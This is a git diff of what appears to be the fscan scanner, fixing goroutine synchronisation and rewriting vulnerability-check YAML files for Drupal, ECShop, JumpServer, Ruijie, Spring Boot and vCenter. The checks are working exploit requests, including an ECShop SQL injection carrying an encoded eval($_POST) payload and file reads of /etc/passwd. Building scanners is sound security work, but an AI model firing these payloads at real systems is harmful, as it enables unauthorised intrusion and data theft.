diff --git a/Plugins/portscan.go b/Plugins/portscan.go index 34330b4..1b53338 100644 --- a/Plugins/portscan.go +++ b/Plugins/portscan.go @@ -26,6 +26,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { go func() { for found := range results { AliveAddress = append(AliveAddress, found) + wg.Done() } }() @@ -33,7 +34,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { for i := 0; i < workers; i++ { go func() { for addr := range Addrs { - PortConnect(addr, results, timeout) + PortConnect(addr, results, timeout, &wg) wg.Done() } }() @@ -42,18 +43,17 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { //添加扫描目标 for _, port := range probePorts { for _, host := range hostslist { - Addrs <- Addr{host, port} wg.Add(1) + Addrs <- Addr{host, port} } } - wg.Wait() close(Addrs) close(results) return AliveAddress } -func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64) { +func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { host, port := addr.ip, addr.port con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) if err == nil { @@ -62,5 +62,6 @@ func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64 result := fmt.Sprintf("%s open", address) common.LogSuccess(result) respondingHosts <- address + wg.Add(1) } } diff --git a/Plugins/scanner.go b/Plugins/scanner.go index 3bd9fed..48faa69 100644 --- a/Plugins/scanner.go +++ b/Plugins/scanner.go @@ -9,7 +9,6 @@ import ( "strconv" "strings" "sync" - "time" ) func Scan(info common.HostInfo) { @@ -65,7 +64,7 @@ func Scan(info common.HostInfo) { } } wg.Wait() - time.Sleep(100 * time.Millisecond) + common.Logwg.Wait() close(common.Results) fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num)) } @@ -78,10 +77,8 @@ func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.W Mutex.Lock() common.Num += 1 Mutex.Unlock() - ScanFunc(PluginList, scantype, &info) wg.Done() - Mutex.Lock() common.End += 1 Mutex.Unlock() diff --git a/README.md b/README.md index 4206e45..052180a 100644 --- a/README.md +++ b/README.md @@ -143,6 +143,14 @@ https://github.com/hack2fun/Gscan https://github.com/k8gege/LadonGo https://github.com/jjf012/gopoc +# 404StarLink 2.0 - Galaxy +![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) + +fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环,如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 + +- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community) + + ## 最近更新 [+] 2021/4/21 加入netbios探测、域控识别 [+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描 diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml index 5697049..22cdad0 100644 --- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml +++ b/WebScan/pocs/drupal-cve-2018-7600-rce.yml @@ -2,35 +2,15 @@ name: poc-yaml-drupal-cve-2018-7600-rce set: r1: randomLowercase(4) r2: randomLowercase(4) -groups: - drupal8: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) - drupal7: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) +rules: + - method: POST + path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) detail: links: - https://github.com/dreadlocked/Drupalgeddon2 diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml index acaa0a0..bb9151c 100644 --- a/WebScan/pocs/ecshop-rce.yml +++ b/WebScan/pocs/ecshop-rce.yml @@ -2,25 +2,15 @@ name: poc-yaml-ecshop-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) -groups: - 2.x: - - method: POST - path: /user.php - headers: - Referer: >- - 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) - 3.x: - - method: POST - path: /user.php - headers: - Referer: >- - 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +rules: + - method: POST + path: /user.php + headers: + Referer: >- + 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: 凉风(http://webkiller.cn/) links: diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml index 36d9752..041832d 100644 --- a/WebScan/pocs/jumpserver-unauth-rce.yml +++ b/WebScan/pocs/jumpserver-unauth-rce.yml @@ -1,29 +1,17 @@ name: poc-yaml-jumpserver-unauth-rce set: r1: randomLowercase(5) -groups: - users: - - method: GET - path: /api/v1/users/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/users/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") - authentication: - - method: GET - path: /api/v1/authentication/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/authentication/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +rules: + - method: GET + path: /api/v1/authentication/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/authentication/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") detail: author: mvhz81 info: jumpserver unauth read logfile + jumpserver rce diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml index 74a9f70..6aa046e 100644 --- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml +++ b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml @@ -4,7 +4,7 @@ rules: path: /login.php follow_redirects: false expression: | - response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && response.body.bcontains(b"password") + response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) detail: author: jweny(https://github.com/jweny) links: diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml index 582ee48..5ddda4f 100644 --- a/WebScan/pocs/springboot-env-unauth.yml +++ b/WebScan/pocs/springboot-env-unauth.yml @@ -1,15 +1,9 @@ name: poc-yaml-springboot-env-unauth -groups: - spring1: - - method: GET - path: /env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") - spring2: - - method: GET - path: /actuator/env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +rules: + - method: GET + path: /env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") detail: links: - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml index d831b24..a32c5c2 100644 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml @@ -1,17 +1,10 @@ name: poc-yaml-vmware-vcenter-arbitrary-file-read -groups: - win: - - method: GET - path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") - linux: - - method: GET - path: /eam/vib?id=/etc/passwd - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +rules: + - method: GET + path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") detail: author: MrP01ntSun(https://github.com/MrPointSun) links: diff --git a/common/log.go b/common/log.go index 47f53bc..44cf509 100644 --- a/common/log.go +++ b/common/log.go @@ -4,6 +4,7 @@ import ( "fmt" "os" "strings" + "sync" "time" ) @@ -14,8 +15,10 @@ var Start = true var LogSucTime int64 var LogErrTime int64 var WaitTime int64 +var Logwg sync.WaitGroup func LogSuccess(result string) { + Logwg.Add(1) LogSucTime = time.Now().Unix() if Start { go SaveLog() @@ -30,6 +33,7 @@ func SaveLog() { if IsSave { WriteFile(result, Outputfile) } + Logwg.Done() } }